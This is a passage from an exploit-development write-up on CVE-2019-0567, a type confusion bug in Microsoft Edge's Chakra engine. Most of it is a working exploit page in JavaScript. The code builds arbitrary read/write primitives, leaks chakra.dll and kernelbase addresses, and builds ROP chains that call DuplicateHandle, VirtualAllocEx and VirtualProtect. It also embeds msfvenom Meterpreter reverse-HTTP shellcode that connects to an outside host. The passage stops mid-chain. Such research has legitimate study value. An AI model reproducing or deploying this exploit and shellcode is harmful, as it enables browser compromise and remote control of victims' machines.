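The four shadow-space slots and the two trailing padding slots are filler from the chain's point of view; only the fifth slot after the return address carries a real argument.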

We can then attach another WinDbg session to the JIT process and examine the write operation.

As we can see, we have remotely written our ROP chain to the stack at RSP! All we have to do now is update our thread’s RIP member via SetThreadContext and then resume the thread to kick off execution!

SetThreadContext and ResumeThread ROP Chain

All that is left now is to set the thread’s CONTEXT and resume the thread. Here is how this looks:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
);
ResumeThread(
	threadHandle				// A handle to the thread we want to resume (our thread we created via CreateRemoteThread)
);

Here is our final exploit:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f8
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// Store where our ROP chain begins
	ropBegin = countMe;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
    inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;
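    // Illustration only (hypothetical helper, not called by the exploit): because a 64-bit value is held as
    // [low 32 bits, high 32 bits], two values match only when both halves match. The stack scan below
    // performs this same comparison inline.
    function sketchQwordEquals(a, b)
    {
        return (a[0] === b[0]) && (a[1] === b[1]);
    }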

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// Confirm exploit 
	alert("[+] Press OK to enjoy the Meterpreter shell :)");

	// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
	jitHandle = read64(chakraLo+0x74d838, chakraHigh);

	// Helper function to be called after each stack write to increment offset to be written to
	function next()
	{
	    counter+=0x8;
	}

	// Begin ROP chain
	// On entry to a __fastcall function, parameters 5 and up are expected at RSP+0x28: the return address sits at RSP, followed by 0x20 bytes of shadow space
	// Normally the caller stores them at RSP+0x20 and the "call" instruction pushes the return address, which shifts them to RSP+0x28
	// Because we jump into our APIs instead of calling them, no return address is pushed for us, so we place these parameters at RSP+0x28 ourselves
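	// Illustration only (hypothetical helper, not called by the exploit): works out where a stack-passed
	// parameter sits relative to RSP at the moment we jump into an API. It assumes the layout used throughout
	// this chain: the "return address" gadget at RSP+0x0, 0x20 bytes of shadow space at RSP+0x8, and parameter 5 at RSP+0x28.
	function sketchStackParamOffset(paramNumber)
	{
	    // Parameters 1-4 travel in RCX, RDX, R8, and R9, so only parameters 5 and up live on the stack
	    if (paramNumber < 5) { throw new RangeError("parameters 1-4 are passed in registers"); }
	    return 0x8 + 0x20 + (paramNumber - 5) * 0x8;
	}
	// e.g. DuplicateHandle's dwDesiredAccess (5), bInheritHandle (6), and dwOptions (7) land at RSP+0x28, RSP+0x30, and RSP+0x38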

	// DuplicateHandle() ROP chain
	// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
	// ACG is disabled in the JIT process
	// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

	// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

	// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

	// HANDLE hSourceHandle (RDX)
	// (HANDLE)-1 pseudo-handle. It is resolved in the context of the source (JIT) process, so it refers to the JIT process itself
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle ((HANDLE)-1)
	next();

	// HANDLE hTargetProcessHandle (R8)
	// (HANDLE)-1 value of current process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
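	// Illustration only (hypothetical helper, not called by the exploit): a gadget ending in "add rsp, N ; ret"
	// skips N / 8 stack slots, and each write64() fills one 8-byte slot, so that is how many padding writes it needs.
	function sketchPaddingQwords(addRspBytes)
	{
	    if (addRspBytes % 0x8 !== 0) { throw new RangeError("stack adjustment must be a multiple of 8"); }
	    return addRspBytes / 0x8;
	}
	// sketchPaddingQwords(0x48) is 9, matching the nine padding writes above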

	// LPHANDLE lpTargetHandle (R9)
	// This needs to be a writable address where the full JIT handle will be stored
	// Using .data section of chakra.dll in a part where there is no data
	/*
	0:053> dqs chakra+0x72E000+0x20010
	00007ffc`052ae010  00000000`00000000
	00007ffc`052ae018  00000000`00000000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hSourceProcessHandle (RCX)
	// Handle to the JIT process from the content process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
	next();

	// Call KERNELBASE!DuplicateHandle
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
	next(); 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
	next();

	// VirtualAllocEx() ROP chain
	// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

	// DWORD flAllocationType (R9)
	// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
	/*
	0:031> ? 0x00002000 | 0x00001000 
	Evaluate expression: 12288 = 00000000`00003000
	*/
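	// Illustration only: the same value computed in JavaScript from the documented Win32 constant values.
	// The SKETCH_* names are hypothetical and are not referenced by the ROP chain below.
	const SKETCH_MEM_COMMIT = 0x00001000;
	const SKETCH_MEM_RESERVE = 0x00002000;
	const sketchAllocationType = SKETCH_MEM_RESERVE | SKETCH_MEM_COMMIT;   // 0x3000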
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// SIZE_T dwSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
